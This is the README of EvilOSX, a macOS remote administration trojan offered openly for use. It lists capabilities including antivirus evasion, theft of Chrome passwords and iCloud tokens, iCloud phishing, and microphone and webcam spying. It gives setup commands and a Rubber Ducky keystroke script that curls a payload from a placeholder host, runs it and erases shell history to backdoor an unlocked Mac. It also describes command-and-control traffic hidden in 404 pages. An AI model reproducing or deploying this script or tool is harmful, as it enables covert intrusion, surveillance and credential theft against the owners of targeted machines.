An evil RAT (Remote Administration Tool) for macOS / OS X.
- Emulate a terminal instance
- Simple extendable module system
- No bot dependencies (pure python)
- Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
- GUI and CLI support
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Retrieve/monitor the clipboard
- Retrieve browser history (Chrome and Safari)
- Phish for iCloud passwords via iTunes
- iTunes (iOS) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation
How To Use
# Clone or download this repository $ git clone https://github.com/Marten4n6/EvilOSX # Go into the repository $ cd EvilOSX # Install dependencies required by the server $ sudo pip install -r requirements.txt # Start the GUI $ python start.py # Lastly, run a built launcher on your target(s)
Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.
There's also a CLI for those who want to use this over SSH:
# Create a launcher to infect your target(s) $ python start.py --builder # Start the CLI $ python start.py --cli --port 1337 # Lastly, run a built launcher on your target(s)
This project was created to be used with my Rubber Ducky, here's the simple script:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX REM See also: https://ducktoolkit.com/vidpid/ DELAY 1000 GUI SPACE DELAY 500 STRING Termina DELAY 1000 ENTER DELAY 1500 REM Kill all terminals after x seconds STRING screen -dm bash -c 'sleep 6; killall Terminal' ENTER STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear ENTER
- It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
- Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.
- To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here.
Aluminum Keyboard (ISO) is probably the one you are looking for.
EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible.
Server and bot releases will be numbered with the follow format:
And constructed with the following guidelines:
- Breaking backward compatibility (with older bots) bumps the major
- New additions without breaking backward compatibility bumps the minor
- Bug fixes and misc changes bump the patch
For more information on SemVer, please visit https://semver.org/.
- Infecting a machine is split up into three parts:
- A launcher is run on the target machine whose only goal is to run the stager
- The stager asks the server for a loader which handles how a payload will be loaded
- The loader is given a uniquely encrypted payload and then sent back to the stager
- The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight")
- Command requests are retrieved from the server via a GET request
- Command responses are sent to the server via a POST request
- Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with zlib, along with any configuration options
- Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline
Feel free to submit any issues or feature requests here.
For a simple guide on how to create modules click here.
- The awesome Empire project
- Shoutout to Patrick Wardle for his awesome talks, check out Objective-See
- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
(now deleted... let me know if you reappear)
- The slowloris module is pretty much copied from PySlowLoris
- urwid and this code which saved me a lot of time with the CLI
- Logo created by motusora